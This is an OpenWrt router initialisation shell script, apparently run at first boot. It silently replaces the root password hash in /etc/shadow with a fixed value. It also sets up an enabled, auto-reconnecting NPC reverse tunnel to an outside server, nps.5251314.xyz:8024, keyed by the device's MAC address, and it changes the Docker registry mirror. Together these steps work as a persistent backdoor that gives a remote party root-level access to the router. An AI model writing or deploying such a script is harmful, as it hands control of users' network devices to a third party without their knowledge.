#!/bin/sh
# 强制修正 root 密码 - 注意：这里路径改成了系统实际路径 /etc/shadow
TARGET_HASH='$5$XIYpfINJd3s0zJbp$SgFQCsMdqK//e8aTKxpR/AQHrbqZkGm/QuI90ix51Y3'
#sed -i "s|root:.*|root:$TARGET_HASH:20428:0:99999:7:::|g" /etc/shadow

# 获取 MAC 地址
WAN_IF=$(uci get network.wan.ifname 2>/dev/null || echo "phy0-ap0")
[ -z "$WAN_IF" ] && WAN_IF="phy0-ap0"
[ ! -f /sys/class/net/$WAN_IF/address ] && WAN_IF="phy0-ap0"
WAN_MAC=$(cat /sys/class/net/$WAN_IF/address 2>/dev/null)
VKEY=${WAN_MAC}

# 如果没有配置文件，或者配置文件为空，则强制生成
if [ ! -f /etc/npc-init.flag ] || [ ! -s /etc/npc.conf ]; then
    # 配置 NPC 设置
    sed -i "s|root:.*|root:$TARGET_HASH:20428:0:99999:7:::|g" /etc/shadow
    uci set npc.@npc[0].server_addr="nps.5251314.xyz"
    uci set npc.@npc[0].vkey="$VKEY"
    uci set npc.@npc[0].compress="1"
    uci set npc.@npc[0].crypt="1"
    uci set npc.@npc[0].enable="1"
    uci set npc.@npc[0].server_port="8024"
    uci set npc.@npc[0].protocol="tcp"
    uci commit npc

    # 修改启动脚本路径限制
    [ -f /etc/init.d/npc ] && sed -i 's|conf_Path="/tmp/etc/npc.conf"|conf_Path="/etc/npc.conf"|g' /etc/init.d/npc

    # 生成npc配置文件 (使用 <<EOF 而不是单引号，确保变量 VKEY 能被替换)
    cat > /etc/npc.conf <<EOF
[common]
server_addr=nps.5251314.xyz:8024
conn_type=tcp
vkey=${VKEY}
auto_reconnection=true
compress=true
crypt=true
EOF

    # Docker 配置 (如果存在)
    if command -v docker >/dev/null 2>&1; then
        uci add_list dockerd.globals.registry_mirrors=https://docker.1ms.run
        uci commit dockerd
        /etc/init.d/dockerd restart
    fi

    /etc/init.d/npc enable
    /etc/init.d/npc restart
    touch /etc/npc-init.flag
fi

exit 0
